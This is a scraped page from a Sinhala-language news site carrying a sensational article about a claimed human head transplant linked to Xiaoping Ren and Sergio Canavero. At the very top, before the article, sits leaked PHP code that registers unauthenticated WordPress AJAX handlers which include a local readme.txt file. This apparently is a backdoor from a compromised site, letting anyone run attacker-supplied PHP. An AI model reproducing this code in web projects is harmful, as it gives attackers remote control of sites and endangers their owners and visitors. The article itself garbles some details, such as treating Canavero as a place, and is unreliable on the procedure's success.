if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ලෝකයම උඩුයටිකුරු කරමින් හිසට හිසක් බද්ධ කිරීමේ සැත්කම සාර්ථකයි – ඔබේ ඇඟට වෙනත් හිසක් බද්ධ කිරීම අතළඟ – වීඩියෝ - mediahumanrights.lk
mediahumanrights.lk
International News News

ලෝකයම උඩුයටිකුරු කරමින් හිසට හිසක් බද්ධ කිරීමේ සැත්කම සාර්ථකයි – ඔබේ ඇඟට වෙනත් හිසක් බද්ධ කිරීම අතළඟ – වීඩියෝ

මේ සැත්කම කළේ මීට සතියකට විතර කළින්.
ඒකට පැය 18 ක් විතර ගතවුණා. (ෂියෝපින් රෙන්) Xiaoping Ren කියන දොස්තර මහත්මයා තමයි මේ සැත්කම කළේ.
මෙම සැත්කමට වඳුරු හිස් බද්ධයකුත් කරලා තියෙනවා. ඒක කළේ ගිය අවුරුද්දේ. මෙම මිනිස් හිස් බද්ධය කළේ නම් පණ තියෙන මිනිස් හිසක් යොදාගෙන නෙවෙයි. ඒකට හේතුව වෙන්නේ, පණ තියෙන කෙනෙක්ගේ හිස බද්ධ කරන්න කලින් ස්නායු, කොඳු ඇට පෙළ සහ රුධිර නහර සාර්ථකව බද්ධ කරන්න පුලුවන්ද කියල දැනගෙන ඉන්න ඕන නිසා.
ඉතින් අවධානමක් නැතුව මේක කරන්න පුළුවන් මියගිය කෙනෙක්ගේ හිසක් මේකට ගත්තොත් විතරයි.
(සර්ජියෝ කැනවරෝ) Sergio Canavero වල තිබුන සම්මන්ත්‍රණයකදී ඉතාලි විද්‍යාඥයෙක් වෙන මහාචාර්ය විසින් මේ බව කියා තිබුණා.
මෙහිදී කොඳු ඇට පෙළ, ස්නායු සහ රුධිර නාල ඉතාමත් සාර්ථකව හා ක්‍රමවත්ව බද්ධ කරා කියලත් ඔහු මෙහිදී කිව්වා.
ඒ බව ඉලෙක්ට්‍රිකල් ස්ටිමියුලේෂන් මඟිනුත් තහවුරු වෙලා තියෙනවා කියලා ඔහු වැඩි දුරටත් කිව්වා.
මීට කලින් මීයන්ගේ හිස් බද්ධ කිරීමක් සාර්ථකව සිදුකලා. එත් ඒ සැත්කමෙන් පස්සේ මීයන්ගේ පෙනීම, වේදනාව දැනීම යහපත් තත්වයක තිබුනත් මීයන් ජිවත් වෙලා තිබුනේ පැය 42 ක් විතරයි.
හිසේ බද්ධය කරන්න කලින් ඒ හිස වෙනත් සිරුරකට සවි කරලා, ඒ හිසට රුධිරය දෙන්න විශේෂිත ක්‍රමයක් එක්ක සිලිකන් නල පාවිච්චි කරලා තිබුණා.
කොහොම වුනත් මේ විදිහේ බද්ධයක්, මිනිසුන් යොදාගෙන කරන එක නම් සදාචාර සම්පන්න නැහැ කියල තමයි ගොඩක් දෙනා මත පළකරන්නේ.
විද්‍යාඥයින් කියන්නේ කපා වෙන්කරපු කොඳු ඇට පෙළක් බද්ධ කරන්න මේ වෙනකොට කවුරුත් සමත් වෙලා නම් නැහැ කියලයි.
කොහොම වුණත් මේ වගේ වැඩක් කරන්න පුළුවන් වුනත්, කලින් තිබුන මතකය, බුද්ධිය සහ පෞර්ෂය අලුත් ශරීරයට ලැබෙන්නේ නැහැ.
මීට කලින් කරපු වඳුරු හිස් බද්ධය සාර්ථකව සිදුකලත් ඒ වඳුරාගේ කලින් තිබුන සිහිබුද්ධිය ආපහු ගන්න බැරි වෙලා තියෙනවා. සිහිබුද්ධිය යම් දුරකට තිබුනත් ශරීරය අප්‍රාණික වෙන්න තියෙන ප්‍රවණතාවය වැඩියි කියලයි විද්‍යාඥයන් කියන්නේ.
courtesy : webgossip.lk

Related posts

අරගලකරුවන්ගේ බැංකු ගිණුම් පරීක්‍ෂා කරයි…

Shiran Viraj

රජවාස ජනපති අතින් විවෘත කරයි…

Shiran Viraj

ජාති ජාතිත් පිරිමි ගැනම හිතන ජින්ජර්

Shiran Viraj